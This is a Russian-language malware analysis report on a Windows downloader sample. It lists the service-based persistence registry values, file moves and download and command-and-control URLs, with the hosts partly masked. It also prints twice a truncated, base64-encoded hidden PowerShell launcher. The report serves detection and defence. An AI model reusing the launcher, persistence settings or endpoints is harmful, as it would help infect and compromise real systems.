Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\cryptxml] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\cryptxml] 'ImagePath' = '"%WINDIR%\SysWOW64\hnetcfg\cryptxml.exe"'
Создает следующие сервисы
- 'cryptxml' "%WINDIR%\SysWOW64\hnetcfg\cryptxml.exe"
- 'cryptxml' %WINDIR%\SysWOW64\hnetcfg\cryptxml.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\133.exe
Удаляет следующие файлы
- %HOMEPATH%\133.exe
Перемещает следующие файлы
- %HOMEPATH%\133.exe в %WINDIR%\syswow64\hnetcfg\cryptxml.exe
Подменяет следующие файлы
- %HOMEPATH%\133.exe
Сетевая активность
Подключается к
- '12#.#5.106.173':443
TCP
Запросы HTTP GET
- http://me##nor.gr/docs/q75cvd/
- http://bn##ati.ir/8iujk/b0/
- http://da####somoy24.com/be53np0/IlLy/
Запросы HTTP POST
- http://12#.##.106.173:443/coz3YzcvS/dbBvZKurovphH7/ftWXhc5m0/Q0H6POZi7BNvdoBCh/ via 12#.#5.106.173
UDP
- DNS ASK te###hint.com
- DNS ASK or#######onale.metodoinforma.it
- DNS ASK me##nor.gr
- DNS ASK bn##ati.ir
- DNS ASK da####somoy24.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)
